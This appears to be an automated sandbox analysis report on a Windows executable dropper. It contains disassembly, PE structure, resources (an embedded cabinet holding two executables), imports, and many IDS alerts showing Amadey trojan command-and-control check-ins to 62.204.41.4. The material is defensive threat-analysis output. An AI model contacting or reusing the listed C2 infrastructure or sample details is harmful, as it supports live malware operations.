                            File Version Minor:0
                            Subsystem Version Major:10
                            Subsystem Version Minor:0
                            Import Hash:646167cce332c1c252cdcb1839e0cf48
                            Instruction
                            call 00007FB39CC17105h
                            jmp 00007FB39CC16A15h
                            push 00000058h
                            push 004072B8h
                            call 00007FB39CC171A7h
                            xor ebx, ebx
                            mov dword ptr [ebp-20h], ebx
                            lea eax, dword ptr [ebp-68h]
                            push eax
                            call dword ptr [0040A184h]
                            mov dword ptr [ebp-04h], ebx
                            mov eax, dword ptr fs:[00000018h]
                            mov esi, dword ptr [eax+04h]
                            mov edi, ebx
                            mov edx, 004088ACh
                            mov ecx, esi
                            xor eax, eax
                            lock cmpxchg dword ptr [edx], ecx
                            test eax, eax
                            je 00007FB39CC16A2Ah
                            cmp eax, esi
                            jne 00007FB39CC16A19h
                            xor esi, esi
                            inc esi
                            mov edi, esi
                            jmp 00007FB39CC16A22h
                            push 000003E8h
                            call dword ptr [0040A188h]
                            jmp 00007FB39CC169E9h
                            xor esi, esi
                            inc esi
                            cmp dword ptr [004088B0h], esi
                            jne 00007FB39CC16A1Ch
                            push 0000001Fh
                            call 00007FB39CC16F3Bh
                            pop ecx
                            jmp 00007FB39CC16A4Ch
                            cmp dword ptr [004088B0h], ebx
                            jne 00007FB39CC16A3Eh
                            mov dword ptr [004088B0h], esi
                            push 004010C4h
                            push 004010B8h
                            call 00007FB39CC16B66h
                            pop ecx
                            pop ecx
                            test eax, eax
                            je 00007FB39CC16A29h
                            mov dword ptr [ebp-04h], FFFFFFFEh
                            mov eax, 000000FFh
                            jmp 00007FB39CC16B49h
                            mov dword ptr [004081E4h], esi
                            cmp dword ptr [004088B0h], esi
                            jne 00007FB39CC16A2Dh
                            push 004010B4h
                            push 004010ACh
                            call 00007FB39CC170F5h
                            pop ecx
                            pop ecx
                            mov dword ptr [000088B0h], 00000000h
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x7ad9c.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x870000x888.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .rsrc0xc0000x7b0000x7ae00False0.9247679298067142data7.854212666782187IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x870000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountry
                            AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                            RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                            RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                            RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                            RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                            RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                            RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                            RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                            RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                            RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                            RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                            RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                            RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                            RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                            RT_DIALOG0x247400x2f2dataEnglishUnited States
                            RT_DIALOG0x24a340x35cdataRussianRussia
                            RT_DIALOG0x24d900x1b0dataEnglishUnited States
                            RT_DIALOG0x24f400x1b4dataRussianRussia
                            RT_DIALOG0x250f40x166dataEnglishUnited States
                            RT_DIALOG0x2525c0x168dataRussianRussia
                            RT_DIALOG0x253c40x1c0dataEnglishUnited States
                            RT_DIALOG0x255840x1e0dataRussianRussia
                            RT_DIALOG0x257640x130dataEnglishUnited States
                            RT_DIALOG0x258940x150dataRussianRussia
                            RT_DIALOG0x259e40x120dataEnglishUnited States
                            RT_DIALOG0x25b040x122dataRussianRussia
                            RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                            RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                            RT_STRING0x25d3c0x520dataEnglishUnited States
                            RT_STRING0x2625c0x52edataRussianRussia
                            RT_STRING0x2678c0x5ccdataEnglishUnited States
                            RT_STRING0x26d580x592dataRussianRussia
                            RT_STRING0x272ec0x4b0dataEnglishUnited States
                            RT_STRING0x2779c0x4b2dataRussianRussia
                            RT_STRING0x27c500x44adataEnglishUnited States
                            RT_STRING0x2809c0x43edataRussianRussia
                            RT_STRING0x284dc0x3cedataEnglishUnited States
                            RT_STRING0x288ac0x2fcdataRussianRussia
                            RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                            RT_RCDATA0x28bb00x5d0beMicrosoft Cabinet archive data, many, 381118 bytes, 2 files, at 0x2c +A "bKug.exe" +A "xriv.exe", ID 1586, number 1, 18 datablocks, 0x1503 compressionEnglishUnited States
                            RT_RCDATA0x85c700x4dataEnglishUnited States
                            RT_RCDATA0x85c740x24dataEnglishUnited States
                            RT_RCDATA0x85c980x7ASCII text, with no line terminatorsEnglishUnited States
                            RT_RCDATA0x85ca00x7ASCII text, with no line terminatorsEnglishUnited States
                            RT_RCDATA0x85ca80x4dataEnglishUnited States
                            RT_RCDATA0x85cac0x9ASCII text, with no line terminatorsEnglishUnited States
                            RT_RCDATA0x85cb80x4dataEnglishUnited States
                            RT_RCDATA0x85cbc0x9ASCII text, with no line terminatorsEnglishUnited States
                            RT_RCDATA0x85cc80x4dataEnglishUnited States
                            RT_RCDATA0x85ccc0x6dataEnglishUnited States
                            RT_RCDATA0x85cd40x7ASCII text, with no line terminatorsEnglishUnited States
                            RT_RCDATA0x85cdc0x7ASCII text, with no line terminatorsEnglishUnited States
                            RT_GROUP_ICON0x85ce40xbcdataEnglishUnited States
                            RT_VERSION0x85da00x408dataEnglishUnited States
                            RT_VERSION0x861a80x410dataRussianRussia
                            RT_MANIFEST0x865b80x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                            DLLImport
                            ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                            KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                            GDI32.dllGetDeviceCaps
                            USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                            msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                            COMCTL32.dll
                            Cabinet.dll
                            VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            RussianRussia
                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            192.168.2.562.204.41.449780802027700 02/07/23-19:57:25.243032TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450240802027700 02/07/23-19:59:33.419821TCP2027700ET TROJAN Amadey CnC Check-In5024080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449814802027700 02/07/23-19:57:35.140362TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449912802027700 02/07/23-19:58:02.026161TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449909802027700 02/07/23-19:58:01.309254TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450237802027700 02/07/23-19:59:32.701921TCP2027700ET TROJAN Amadey CnC Check-In5023780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450433802027700 02/07/23-20:00:26.461663TCP2027700ET TROJAN Amadey CnC Check-In5043380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450139802027700 02/07/23-19:59:06.422233TCP2027700ET TROJAN Amadey CnC Check-In5013980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450209802027700 02/07/23-19:59:25.926205TCP2027700ET TROJAN Amadey CnC Check-In5020980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450335802027700 02/07/23-19:59:58.469497TCP2027700ET TROJAN Amadey CnC Check-In5033580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450175802027700 02/07/23-19:59:15.074931TCP2027700ET TROJAN Amadey CnC Check-In5017580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450307802027700 02/07/23-19:59:51.711604TCP2027700ET TROJAN Amadey CnC Check-In5030780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449847802027700 02/07/23-19:57:43.302254TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449749802027700 02/07/23-19:57:17.867893TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450466802027700 02/07/23-20:00:34.175411TCP2027700ET TROJAN Amadey CnC Check-In5046680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450016802027700 02/07/23-19:58:31.545050TCP2027700ET TROJAN Amadey CnC Check-In5001680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450114802027700 02/07/23-19:58:57.604605TCP2027700ET TROJAN Amadey CnC Check-In5011480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450212802027700 02/07/23-19:59:26.656555TCP2027700ET TROJAN Amadey CnC Check-In5021280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450368802027700 02/07/23-20:00:08.721533TCP2027700ET TROJAN Amadey CnC Check-In5036880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450273802027700 02/07/23-19:59:41.686869TCP2027700ET TROJAN Amadey CnC Check-In5027380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450371802027700 02/07/23-20:00:09.426162TCP2027700ET TROJAN Amadey CnC Check-In5037180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450077802027700 02/07/23-19:58:48.624595TCP2027700ET TROJAN Amadey CnC Check-In5007780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450170802027700 02/07/23-19:59:13.888323TCP2027700ET TROJAN Amadey CnC Check-In5017080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450310802027700 02/07/23-19:59:52.435304TCP2027700ET TROJAN Amadey CnC Check-In5031080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449945802027700 02/07/23-19:58:12.060541TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450458802027700 02/07/23-20:00:32.245201TCP2027700ET TROJAN Amadey CnC Check-In5045880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449839802027700 02/07/23-19:57:41.005570TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450167802027700 02/07/23-19:59:13.182938TCP2027700ET TROJAN Amadey CnC Check-In5016780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450072802027700 02/07/23-19:58:47.386919TCP2027700ET TROJAN Amadey CnC Check-In5007280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450049802027700 02/07/23-19:58:39.386685TCP2027700ET TROJAN Amadey CnC Check-In5004980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450008802027700 02/07/23-19:58:29.531823TCP2027700ET TROJAN Amadey CnC Check-In5000880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450204802027700 02/07/23-19:59:22.348680TCP2027700ET TROJAN Amadey CnC Check-In5020480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450400802027700 02/07/23-20:00:16.471395TCP2027700ET TROJAN Amadey CnC Check-In5040080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449744802027700 02/07/23-19:57:16.664080TCP2027700ET TROJAN Amadey CnC Check-In4974480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449940802027700 02/07/23-19:58:10.825829TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449998802027700 02/07/23-19:58:27.044687TCP2027700ET TROJAN Amadey CnC Check-In4999880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449822802027700 02/07/23-19:57:36.840230TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450150802027700 02/07/23-19:59:09.040992TCP2027700ET TROJAN Amadey CnC Check-In5015080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450363802027700 02/07/23-20:00:07.542076TCP2027700ET TROJAN Amadey CnC Check-In5036380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450080802027700 02/07/23-19:58:49.338343TCP2027700ET TROJAN Amadey CnC Check-In5008080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450405802027700 02/07/23-20:00:17.657437TCP2027700ET TROJAN Amadey CnC Check-In5040580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450441802027700 02/07/23-20:00:28.375723TCP2027700ET TROJAN Amadey CnC Check-In5044180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449870802027700 02/07/23-19:57:52.051772TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450044802027700 02/07/23-19:58:38.182720TCP2027700ET TROJAN Amadey CnC Check-In5004480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449917802027700 02/07/23-19:58:03.280189TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450245802027700 02/07/23-19:59:34.591841TCP2027700ET TROJAN Amadey CnC Check-In5024580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449875802027700 02/07/23-19:57:53.010907TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450298802027700 02/07/23-19:59:49.514228TCP2027700ET TROJAN Amadey CnC Check-In5029880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449757802027700 02/07/23-19:57:19.196421TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450024802027700 02/07/23-19:58:33.541536TCP2027700ET TROJAN Amadey CnC Check-In5002480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450315802027700 02/07/23-19:59:53.640304TCP2027700ET TROJAN Amadey CnC Check-In5031580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450085802027700 02/07/23-19:58:50.542002TCP2027700ET TROJAN Amadey CnC Check-In5008580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450413802027700 02/07/23-20:00:19.937795TCP2027700ET TROJAN Amadey CnC Check-In5041380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449867802027700 02/07/23-19:57:51.323673TCP2027700ET TROJAN Amadey CnC Check-In4986780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450195802027700 02/07/23-19:59:19.673213TCP2027700ET TROJAN Amadey CnC Check-In5019580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449711802027700 02/07/23-19:57:09.336516TCP2027700ET TROJAN Amadey CnC Check-In4971180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449895802027700 02/07/23-19:57:57.922450TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449965802027700 02/07/23-19:58:16.796475TCP2027700ET TROJAN Amadey CnC Check-In4996580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450293802027700 02/07/23-19:59:48.325220TCP2027700ET TROJAN Amadey CnC Check-In5029380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450122802027700 02/07/23-19:58:59.516632TCP2027700ET TROJAN Amadey CnC Check-In5012280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450278802027700 02/07/23-19:59:44.686906TCP2027700ET TROJAN Amadey CnC Check-In5027880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450376802027700 02/07/23-20:00:10.676242TCP2027700ET TROJAN Amadey CnC Check-In5037680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450232802027700 02/07/23-19:59:31.467525TCP2027700ET TROJAN Amadey CnC Check-In5023280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449729802027700 02/07/23-19:57:13.008119TCP2027700ET TROJAN Amadey CnC Check-In4972980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449981802027700 02/07/23-19:58:20.676823TCP2027700ET TROJAN Amadey CnC Check-In4998180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450330802027700 02/07/23-19:59:57.254968TCP2027700ET TROJAN Amadey CnC Check-In5033080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450229802027700 02/07/23-19:59:30.761202TCP2027700ET TROJAN Amadey CnC Check-In5022980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450057802027700 02/07/23-19:58:41.341646TCP2027700ET TROJAN Amadey CnC Check-In5005780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449904802027700 02/07/23-19:58:00.083813TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449732802027700 02/07/23-19:57:13.710639TCP2027700ET TROJAN Amadey CnC Check-In4973280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449830802027700 02/07/23-19:57:38.830731TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449986802027700 02/07/23-19:58:21.857184TCP2027700ET TROJAN Amadey CnC Check-In4998680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450265802027700 02/07/23-19:59:39.451988TCP2027700ET TROJAN Amadey CnC Check-In5026580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449937802027700 02/07/23-19:58:10.104815TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449862802027700 02/07/23-19:57:50.104682TCP2027700ET TROJAN Amadey CnC Check-In4986280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450302802027700 02/07/23-19:59:50.470972TCP2027700ET TROJAN Amadey CnC Check-In5030280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450060802027700 02/07/23-19:58:42.295231TCP2027700ET TROJAN Amadey CnC Check-In5006080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450190802027700 02/07/23-19:59:18.716317TCP2027700ET TROJAN Amadey CnC Check-In5019080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449978802027700 02/07/23-19:58:19.951026TCP2027700ET TROJAN Amadey CnC Check-In4997880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449724802027700 02/07/23-19:57:11.745483TCP2027700ET TROJAN Amadey CnC Check-In4972480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450011802027700 02/07/23-19:58:30.290364TCP2027700ET TROJAN Amadey CnC Check-In5001180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450224802027700 02/07/23-19:59:29.577696TCP2027700ET TROJAN Amadey CnC Check-In5022480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450052802027700 02/07/23-19:58:40.105001TCP2027700ET TROJAN Amadey CnC Check-In5005280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450348802027700 02/07/23-20:00:03.954544TCP2027700ET TROJAN Amadey CnC Check-In5034880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450159802027700 02/07/23-19:59:11.230109TCP2027700ET TROJAN Amadey CnC Check-In5015980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450384802027700 02/07/23-20:00:12.627471TCP2027700ET TROJAN Amadey CnC Check-In5038480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449765802027700 02/07/23-19:57:20.854177TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450029802027700 02/07/23-19:58:34.809953TCP2027700ET TROJAN Amadey CnC Check-In5002980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450130802027700 02/07/23-19:59:01.720565TCP2027700ET TROJAN Amadey CnC Check-In5013080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450343802027700 02/07/23-20:00:00.779938TCP2027700ET TROJAN Amadey CnC Check-In5034380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450421802027700 02/07/23-20:00:23.597298TCP2027700ET TROJAN Amadey CnC Check-In5042180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450260802027700 02/07/23-19:59:38.219727TCP2027700ET TROJAN Amadey CnC Check-In5026080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449932802027700 02/07/23-19:58:09.150327TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449890802027700 02/07/23-19:57:56.718243TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449802802027700 02/07/23-19:57:32.212401TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449760802027700 02/07/23-19:57:19.749026TCP2027700ET TROJAN Amadey CnC Check-In4976080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449973802027700 02/07/23-19:58:18.734052TCP2027700ET TROJAN Amadey CnC Check-In4997380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449728802027700 02/07/23-19:57:12.773087TCP2027700ET TROJAN Amadey CnC Check-In4972880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449985802027700 02/07/23-19:58:21.623964TCP2027700ET TROJAN Amadey CnC Check-In4998580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449731802027700 02/07/23-19:57:13.477085TCP2027700ET TROJAN Amadey CnC Check-In4973180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449798802027700 02/07/23-19:57:31.270025TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449887802027700 02/07/23-19:57:55.996115TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450249802027700 02/07/23-19:59:35.548839TCP2027700ET TROJAN Amadey CnC Check-In5024980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450347802027700 02/07/23-20:00:03.721907TCP2027700ET TROJAN Amadey CnC Check-In5034780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450445802027700 02/07/23-20:00:29.348634TCP2027700ET TROJAN Amadey CnC Check-In5044580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449896802027700 02/07/23-19:57:58.170170TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450350802027700 02/07/23-20:00:04.422898TCP2027700ET TROJAN Amadey CnC Check-In5035080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449737802027700 02/07/23-19:57:14.935623TCP2027700ET TROJAN Amadey CnC Check-In4973780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450252802027700 02/07/23-19:59:36.278597TCP2027700ET TROJAN Amadey CnC Check-In5025280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449826802027700 02/07/23-19:57:37.847264TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450163802027700 02/07/23-19:59:12.188385TCP2027700ET TROJAN Amadey CnC Check-In5016380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450191802027700 02/07/23-19:59:18.961060TCP2027700ET TROJAN Amadey CnC Check-In5019180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450261802027700 02/07/23-19:59:38.469324TCP2027700ET TROJAN Amadey CnC Check-In5026180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450093802027700 02/07/23-19:58:52.513268TCP2027700ET TROJAN Amadey CnC Check-In5009380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450280802027700 02/07/23-19:59:45.156579TCP2027700ET TROJAN Amadey CnC Check-In5028080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449859802027700 02/07/23-19:57:49.355361TCP2027700ET TROJAN Amadey CnC Check-In4985980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450356802027700 02/07/23-20:00:05.846184TCP2027700ET TROJAN Amadey CnC Check-In5035680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450004802027700 02/07/23-19:58:28.516743TCP2027700ET TROJAN Amadey CnC Check-In5000480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450102802027700 02/07/23-19:58:54.714299TCP2027700ET TROJAN Amadey CnC Check-In5010280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450258802027700 02/07/23-19:59:37.739913TCP2027700ET TROJAN Amadey CnC Check-In5025880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450089802027700 02/07/23-19:58:51.531272TCP2027700ET TROJAN Amadey CnC Check-In5008980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449960802027700 02/07/23-19:58:15.604284TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449868802027700 02/07/23-19:57:51.563260TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.562.204.41.4
